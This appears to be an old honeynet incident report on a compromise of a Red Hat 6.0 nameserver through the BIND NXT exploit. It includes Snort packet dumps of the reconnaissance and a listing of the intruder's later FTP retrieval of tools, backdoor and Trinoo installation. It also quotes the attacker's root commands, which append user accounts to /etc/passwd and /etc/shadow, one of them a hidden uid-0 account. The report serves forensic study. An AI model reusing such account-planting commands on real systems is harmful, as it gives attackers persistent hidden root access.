Executive Summary
-----------------
On 26 April, at 06:43:05 the system 213.28.22.189
initiated a Named NXT attack on the NS running
RH 6.0.  The exploit was successfull. Upon gaining
root, user ftpd to another system, download bj.c,
then implemented the backdoor and did some
system modification.  2 follow on connections were
made from 2 other systems owned by the attacker.

On 9 May, our friend returns and installs Trinoo.

Detailed Write Up
-----------------
The attack, step by step.  Raw data can be found in
snort-0426@0005.log:

STEP 1 - Version Bind Query: 
Identifies system as vulnerable
04/25-02:08:07.227412 63.226.81.13:4499 -> 172.16.1.107:53
UDP TTL:50 TOS:0x0 ID:23611 
Len: 38
9A 9A 01 80 00 01 00 00 00 00 00 00 07 76 65 72  .............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03        sion.bind.....

04/25-02:08:07.227891 172.16.1.107:53 -> 63.226.81.13:4499
UDP TTL:64 TOS:0x0 ID:18424 
Len: 66
9A 9A 85 80 00 01 00 01 00 00 00 00 07 76 65 72  .............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03 07 56  sion.bind......V
45 52 53 49 4F 4E 04 42 49 4E 44 00 00 10 00 03  ERSION.BIND.....
00 00 00 00 00 04 03 38 2E 32                    .......8.2

STEP 2 - The Exploit
Initiate lookup of r.rsavings.net, which results in exploit.
See exploit.txt for details of how the attack was ran, including
actual packet traces. Look for the "--- COMMENT: ----"
in exploit.txt for my own comments.  Also, read NXT-Howto.txt
on how the exploit works. 

The following exploit code was ran on the victim as root:

cd /; uname -a; pwd; id;
Linux apollo.uicmba.edu 2.2.5-15 #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown
/
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd
echo "twin:w3nT2H0b6AjM2:::::::" >> /etc/shadow

echo "hantu::0:0::/:/bin/bash" >> /etc/passwd
echo "hantu:w3nT2H0b6AjM2:::::::" >> /etc/shadow


NOTE: hantu means 'ghost' in Indonesian.  Man, and I thought
learning the language would never benefit me :)


STEP 3 - Access and the Backdoor 
The intruder telnets in from 213.28.22.189.  Gains access
and implements the backdoor bj.c.  See actual telnet
keystrokes in directory 213.28.22.189.  Note the use of
'pico' to implement the backdoor.  Also see tools
directory for his goodies and .bash_history file.


Additional Files
----------------
213.28.22.189 	Directory containing snort session breakout
		files for telnet connection to compromised
		system (keystrokes)
24.112.167.35  	System ftpd to for retrieval of goodies
62.161.85.30  	Telneted back in, used backdoor
63.226.81.13	DNS server used to launch exploit
exploit.txt	Actual snort signatures from Named NXT exploit
NXT-Howto.txt	Black-hat HOWTO on the exploit, excellent reading!
snort.alert


